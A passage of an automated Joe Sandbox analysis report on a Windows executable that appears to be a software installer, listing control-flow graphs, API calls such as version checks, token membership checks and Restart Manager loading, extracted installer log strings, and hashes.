58203->58109 58204->58128 58205->58141 58206->58141 58208 423a3d GetWindowLongA 58207->58208 58209 423a49 58207->58209 58208->58209
                                                                              Strings
                                                                              • Failed to strip read-only attribute., xrefs: 00470D47
                                                                              • Installing into GAC, xrefs: 00471588
                                                                              • Time stamp of our file: %s, xrefs: 0047080F
                                                                              • Version of our file: %u.%u.%u.%u, xrefs: 00470964
                                                                              • Dest file is protected by Windows File Protection., xrefs: 00470761
                                                                              • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470B29
                                                                              • Dest filename: %s, xrefs: 00470708
                                                                              • Uninstaller requires administrator: %s, xrefs: 00471003
                                                                              • , xrefs: 00470A43, 00470C14, 00470C92
                                                                              • Existing file has a later time stamp. Skipping., xrefs: 00470C43
                                                                              • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470B38
                                                                              • Incrementing shared file count (32-bit)., xrefs: 00471419
                                                                              • Will register the file (a DLL/OCX) later., xrefs: 00471393
                                                                              • Version of our file: (none), xrefs: 00470970
                                                                              • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470D0A
                                                                              • Couldn't read time stamp. Skipping., xrefs: 00470BA9
                                                                              • .tmp, xrefs: 00470E2B
                                                                              • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D6E
                                                                              • Same version. Skipping., xrefs: 00470B59
                                                                              • Stripped read-only attribute., xrefs: 00470D3B
                                                                              • Incrementing shared file count (64-bit)., xrefs: 00471400
                                                                              • Version of existing file: %u.%u.%u.%u, xrefs: 004709F0
                                                                              • Time stamp of our file: (failed to read), xrefs: 0047081B
                                                                              • Non-default bitness: 64-bit, xrefs: 00470723
                                                                              • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470842
                                                                              • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470B44
                                                                              • Same time stamp. Skipping., xrefs: 00470BC9
                                                                              • -- File entry --, xrefs: 0047056F
                                                                              • @, xrefs: 00470624
                                                                              • Time stamp of existing file: %s, xrefs: 0047089F
                                                                              • Dest file exists., xrefs: 0047082F
                                                                              • Time stamp of existing file: (failed to read), xrefs: 004708AB
                                                                              • User opted not to overwrite the existing file. Skipping., xrefs: 00470CC1
                                                                              • Non-default bitness: 32-bit, xrefs: 0047072F
                                                                              • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C60
                                                                              • Will register the file (a type library) later., xrefs: 00471387
                                                                              • InUn, xrefs: 00470FD3
                                                                              • Installing the file., xrefs: 00470D7D
                                                                              • Version of existing file: (none), xrefs: 00470B6E
                                                                              • Existing file is a newer version. Skipping., xrefs: 00470A76
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                              • API String ID: 0-4021121268
                                                                              • Opcode ID: 9d68f8344ce4977df8583e247318b1194b32105c4f4fc62b9f0a4044c1636d2c
                                                                              • Instruction ID: b563e12d89f4af072a7005ff78b426759e5259748c8527a90f65f129335a0b73
                                                                              • Opcode Fuzzy Hash: 9d68f8344ce4977df8583e247318b1194b32105c4f4fc62b9f0a4044c1636d2c
                                                                              • Instruction Fuzzy Hash: 0B925234A0424CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392D778AE45CB59

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1593 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1593 1594 42e1bd-42e1c5 GetLastError 1589->1594 1591 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1591 1592 42e16a-42e16f call 4031bc 1590->1592 1591->1589 1597 42e189-42e18e call 4031bc 1591->1597 1592->1581 1604 42e208-42e210 1593->1604 1605 42e1fc-42e206 call 4031bc * 2 1593->1605 1594->1593 1598 42e1c7-42e1d1 call 4031bc * 2 1594->1598 1597->1581 1598->1581 1609 42e212-42e213 1604->1609 1610 42e243-42e261 call 402660 CloseHandle 1604->1610 1605->1581 1614 42e215-42e228 EqualSid 1609->1614 1617 42e22a-42e237 1614->1617 1618 42e23f-42e241 1614->1618 1617->1618 1620 42e239-42e23d 1617->1620 1618->1610 1618->1614 1620->1610
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                              • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                              • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                              • String ID: 1{I$CheckTokenMembership$advapi32.dll
                                                                              • API String ID: 2252812187-4020693264
                                                                              • Opcode ID: 99385c8667cd0eb2f7e8a761a457fbfbdd7e71a8091fdfbf45cde5befae85eff
                                                                              • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                              • Opcode Fuzzy Hash: 99385c8667cd0eb2f7e8a761a457fbfbdd7e71a8091fdfbf45cde5befae85eff
                                                                              • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00480636), ref: 004502D3
                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480636), ref: 004502EB
                                                                              • GetProcAddress.KERNEL32(6E570000,RmStartSession), ref: 00450309
                                                                              • GetProcAddress.KERNEL32(6E570000,RmRegisterResources), ref: 0045031E
                                                                              • GetProcAddress.KERNEL32(6E570000,RmGetList), ref: 00450333
                                                                              • GetProcAddress.KERNEL32(6E570000,RmShutdown), ref: 00450348
                                                                              • GetProcAddress.KERNEL32(6E570000,RmRestart), ref: 0045035D
                                                                              • GetProcAddress.KERNEL32(6E570000,RmEndSession), ref: 00450372
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadVersion
                                                                              • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                              • API String ID: 1968650500-3419246398
                                                                              • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                              • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                              • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                              • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1797 423cec-423cf1 1792->1797 1798 423c8d 1792->1798 1827 423c63-423c6b 1794->1827 1828 423c70-423c72 1794->1828 1800 423cf3 1797->1800 1801 423d27-423d2c 1797->1801 1802 423c93-423c96 1798->1802 1803 423d50-423d60 1798->1803 1804 423fb1-423fb9 1800->1804 1805 423cf9-423d01 1800->1805 1808 423d32-423d35 1801->1808 1809 42409a-4240a8 IsIconic 1801->1809 1806 423cc5-423cc8 1802->1806 1807 423c98 1802->1807 1810 423d62-423d67 1803->1810 1811 423d6b-423d73 call 424194 1803->1811 1816 424152-42415a 1804->1816 1822 423fbf-423fca call 4181e0 1804->1822 1814 423f13-423f3a SendMessageA 1805->1814 1815 423d07-423d0c 1805->1815 1823 423da9-423db0 1806->1823 1824 423cce-423ccf 1806->1824 1818 423df6-423e06 call 423b84 1807->1818 1819 423c9e-423ca1 1807->1819 1820 4240d6-4240eb call 424850 1808->1820 1821 423d3b-423d3c 1808->1821 1809->1816 1817 4240ae-4240b9 GetFocus 1809->1817 1825 423d78-423d80 call 4241dc 1810->1825 1826 423d69-423d8c call 423b84 1810->1826 1811->1816 1814->1816 1841 423d12-423d13 1815->1841 1842 42404a-424055 1815->1842 1830 424171-424177 1816->1830 1817->1816 1833 4240bf-4240c8 call 41eff4 1817->1833 1818->1816 1834 423ca7-423caa 1819->1834 1835 423e1e-423e3a PostMessageA call 423b84 1819->1835 1820->1816 1844 423d42-423d45 1821->1844 1845 4240ed-4240f4 1821->1845 1822->1816 1877 423fd0-423fdf call 4181e0 IsWindowEnabled 1822->1877 1823->1816 1838 423db6-423dbd 1823->1838 1839 423cd5-423cd8 1824->1839 1840 423f3f-423f46 1824->1840 1825->1816 1826->1816 1827->1830 1828->1792 1828->1794 1833->1816 1889 4240ce-4240d4 SetFocus 1833->1889 1851 423cb0-423cb3 1834->1851 1852 423ea5-423eac 1834->1852 1835->1816 1838->1816 1857 423dc3-423dc9 1838->1857 1858 423cde-423ce1 1839->1858 1859 423e3f-423e5f call 423b84 1839->1859 1840->1816 1847 423f4c-423f51 call 404e54 1840->1847 1860 424072-42407d 1841->1860 1861 423d19-423d1c 1841->1861 1842->1816 1863 42405b-42406d 1842->1863 1864 424120-424127 1844->1864 1865 423d4b 1844->1865 1854 4240f6-424109 call 4244d4 1845->1854 1855 42410b-42411e call 42452c 1845->1855 1847->1816 1872 423cb9-423cba 1851->1872 1873 423dce-423ddc IsIconic 1851->1873 1874 423eae-423ec1 call 423b14 1852->1874 1875 423edf-423ef0 call 423b84 1852->1875 1854->1816 1855->1816 1857->1816 1878 423ce7 1858->1878 1879 423e0b-423e19 call 424178 1858->1879 1904 423e83-423ea0 call 423a84 PostMessageA 1859->1904 1905 423e61-423e7e call 423b14 PostMessageA 1859->1905 1860->1816 1866 424083-424095 1860->1866 1883 423d22 1861->1883 1884 423f56-423f5e 1861->1884 1863->1816 1881 42413a-424149 1864->1881 1882 424129-424138 1864->1882 1885 42414b-42414c call 423b84 1865->1885 1866->1816 1890 423cc0 1872->1890 1891 423d91-423d99 1872->1891 1897 423dea-423df1 call 423b84 1873->1897 1898 423dde-423de5 call 423bc0 1873->1898 1919 423ed3-423eda call 423b84 1874->1919 1920 423ec3-423ecd call 41ef58 1874->1920 1924 423ef2-423ef8 call 41eea4 1875->1924 1925 423f06-423f0e call 423a84 1875->1925 1877->1816 1921 423fe5-423ff4 call 4181e0 IsWindowVisible 1877->1921 1878->1885 1879->1816 1881->1816 1882->1816 1883->1885 1884->1816 1888 423f64-423f6b 1884->1888 1913 424151 1885->1913 1888->1816 1906 423f71-423f80 call 4181e0 IsWindowEnabled 1888->1906 1889->1816 1890->1885 1891->1816 1907 423d9f-423da4 call 422c4c 1891->1907 1897->1816 1898->1816 1904->1816 1905->1816 1906->1816 1935 423f86-423f9c call 412310 1906->1935 1907->1816 1913->1816 1919->1816 1920->1919 1921->1816 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1921->1942 1939 423efd-423f00 1924->1939 1925->1816 1935->1816 1945 423fa2-423fac 1935->1945 1939->1925 1942->1816 1945->1816
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9e250b99cf182ccbef41989ebe76349b30642d984367dffe3cd9cb4059d0181
                                                                              • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                              • Opcode Fuzzy Hash: b9e250b99cf182ccbef41989ebe76349b30642d984367dffe3cd9cb4059d0181
                                                                              • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                                              APIs
                                                                                • Part of subcall function 0049543C: GetWindowRect.USER32(00000000), ref: 00495452
                                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 004675E7
                                                                                • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,00467601), ref: 0041D6DB
                                                                                • Part of subcall function 00466FF4: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467097
                                                                                • Part of subcall function 00466FF4: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004670BD
                                                                                • Part of subcall function 00466FF4: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467114
                                                                                • Part of subcall function 004669B4: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046769C,00000000,00000000,00000000,0000000C,00000000), ref: 004669CC
                                                                                • Part of subcall function 004956C0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004956CA
                                                                                • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                • Part of subcall function 0049538C: GetDC.USER32(00000000), ref: 004953AE
                                                                                • Part of subcall function 0049538C: SelectObject.GDI32(?,00000000), ref: 004953D4
                                                                                • Part of subcall function 0049538C: ReleaseDC.USER32(00000000,?), ref: 00495425
                                                                                • Part of subcall function 004956B0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004956BA
                                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0235FAF0,02361850,?,?,02361880,?,?,023618D0,?), ref: 00468271
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468282
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046829A
                                                                                • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                              • String ID: $(Default)$STOPIMAGE
                                                                              • API String ID: 3231140908-770201673
                                                                              • Opcode ID: d8aa18b457e06c76cf1710bd301156fff42577b8956d306d2f0c8863d05d0704
                                                                              • Instruction ID: 95164e1e617b107b44698f642e4cc1154f551ad52f4085116ed94e07ec8bca55
                                                                              • Opcode Fuzzy Hash: d8aa18b457e06c76cf1710bd301156fff42577b8956d306d2f0c8863d05d0704
                                                                              • Instruction Fuzzy Hash: BEF2C6786005148FCB00EB59D9D9F9973F1BF49304F1542BAE9049B36ADB74EC4ACB8A
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00474F66,?,?,0049C1DC,00000000), ref: 00474E55
                                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474F66,?,?,0049C1DC,00000000), ref: 00474F32
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474F66,?,?,0049C1DC,00000000), ref: 00474F40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID: unins$unins???.*
                                                                              • API String ID: 3541575487-1009660736
                                                                              • Opcode ID: 5e576b03208d2e259677c02318acd6f2ad4d278db2359f1cb77b12eb5b061527
                                                                              • Instruction ID: 31c653d7bd6b2cf4ad5ba67a359891eda5ad6ed959604e3cb46055c530bb22dc
                                                                              • Opcode Fuzzy Hash: 5e576b03208d2e259677c02318acd6f2ad4d278db2359f1cb77b12eb5b061527
                                                                              • Instruction Fuzzy Hash: 2A313370A001089FCB10EF65D991ADEB7A9DF85318F51C4B6F80CA76A2DB389F418B58
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileFindFirstLast
                                                                              • String ID:
                                                                              • API String ID: 873889042-0
                                                                              • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                              • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                              • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                              • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000434,0046DFEE), ref: 0046DF62
                                                                              • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,00000434,0046DFEE), ref: 0046DF7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstanceVersion
                                                                              • String ID:
                                                                              • API String ID: 1462612201-0
                                                                              • Opcode ID: 590230f93a95ca5811c62fe34acfb8e2c0307c22a832fa8ed403bfd539588e2d
                                                                              • Instruction ID: 3442edb0ea1fabc64a92ad6c3e34ff78e3c28f6093e8310d9e86ee8e53d0260d
                                                                              • Opcode Fuzzy Hash: 590230f93a95ca5811c62fe34acfb8e2c0307c22a832fa8ed403bfd539588e2d
                                                                              • Instruction Fuzzy Hash: 4EF0A031B85200DEEB14A7A9DC45B463BD4BB24328F04007BF0448B295E3AC9850861F
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                              • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                              • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                              • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                              • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                              • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                              • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                              APIs
